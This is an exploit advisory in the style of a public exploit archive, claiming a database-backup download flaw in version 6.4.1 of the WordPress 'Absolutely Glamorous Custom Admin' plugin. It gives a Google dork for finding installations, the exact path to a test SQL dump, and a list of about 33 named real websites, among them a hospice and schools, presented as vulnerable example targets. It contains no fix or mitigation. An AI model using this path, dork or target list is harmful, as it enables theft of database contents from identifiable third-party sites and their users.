WordPress Absolutely Glamorous Custom Admin plugin version 6.4.1 suffers from a database disclosure vulnerability.
afba620051aab1d8fc5a9b455aa7adaf#################################################################################################
# Exploit Title : WordPress Absolutely Glamorous Custom Admin
ag-custom-admin Plugin Database Backup Arbitrary File Download Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 19/11/2018
# Vendor Homepage : wordpress.org
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork : inurl:''/wp-content/plugins/ag-custom-admin/''
# Software Download Link :
wordpress.org/plugins/ag-custom-admin/
downloads.wordpress.org/plugin/ag-custom-admin.6.4.1.zip
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ] -
CWE-23 - [ Relative Path Traversal ]
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Database Backup Arbitrary File Download Exploit :
/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
#################################################################################################
# Example Vulnerable Sites =>
[+]
restaurant-le-lautrec.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+]
lesgitesdeboucancanot.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+] lebonpicnic.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+]
yatesdialaride.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+]
clp-immobilier.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+]
westernskybooks.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+] zrpath.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+]
americabusiness.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+] kewwoods.co.uk/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+]
distributionsfranco.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+] lbu.edu.np/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+] c-pub-studio.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+]
torrevieja-immo.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+] knightmuseum.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+]
commanderie-vins-amboise.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+]
centre-psyrene.fr/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+] jacksonarts.org/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+]
ysgolgyfunystalyfera.co.uk/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+]
carletonhouse.co.uk/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+]
cursodearduino.net/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+] bvhs.co.uk/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+] operaontap.org/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+]
campingsmleuca.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+]
traiteurmariage35.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+]
anandaprofessional.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+] hotelrelax.cz/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+] autour-daix.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+]
massociedad.org.mx/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+]
pensaracademy.org/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+] ucoweb.org/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+]
agencemacmedia.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+]
tidewellhospice.org/volunteerapp/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[+] 7riversbbbs.org/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################